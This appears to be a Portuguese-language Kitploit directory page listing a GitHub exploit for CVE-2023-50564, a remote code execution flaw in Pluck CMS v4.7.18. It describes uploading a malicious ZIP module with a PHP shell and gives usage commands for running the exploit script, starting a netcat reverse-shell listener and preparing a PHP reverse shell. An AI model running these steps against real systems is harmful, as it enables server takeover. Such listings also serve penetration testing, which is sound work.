Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-50564 — Pluck v4.7.18 - Execução Remota de Código (RCE) | Kitploit
Ferramentas/GitHubGitHub/glynzr/cve-2023-50564
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubglynzr/cve-2023-50564

CVE-2023-50564

Pluck v4.7.18 - Execução Remota de Código (RCE)

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-50564

📌 Descrição

Este exploit permite que um administrador autenticado no Pluck CMS v4.7.18 faça upload de um módulo ZIP malicioso contendo um shell PHP, resultando em execução remota de código (RCE).


⚙️ Recursos

  • Autentica no alvo usando um nome de usuário e senha válidos
  • Cria automaticamente um arquivo ZIP a partir de um arquivo PHP fornecido
  • Envia o módulo para o endpoint vulnerável installmodule
  • Dispara o payload e exibe a saída
  • Suporta alvo, porta, credenciais e caminho do shell personalizados

🚀 Uso

root@kitploit:~
git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt

python3 exploit.py -h
root@kitploit:~
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
  • A porta é opcional e o padrão é 80 se não for especificada.
  • Ao especificar o alvo, o endereço IP ou nome de domínio é obrigatório (ex.: 127.0.0.1 ou test.domain).

Exemplo de exploit

Primeiro, o listener do reverse shell deve ser iniciado na máquina do atacante (esta aba do terminal não deve ser encerrada):

root@kitploit:~
nc -nvlp <specify port>

Em seguida, baixe o php reverse shell de https://github.com/pentestmonkey/php-reverse-shell e personalize-o de acordo com a máquina do atacante. (IP, porta)

Execute o código do exploit em outra aba:

root@kitploit:~
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php
Baixar ferramenta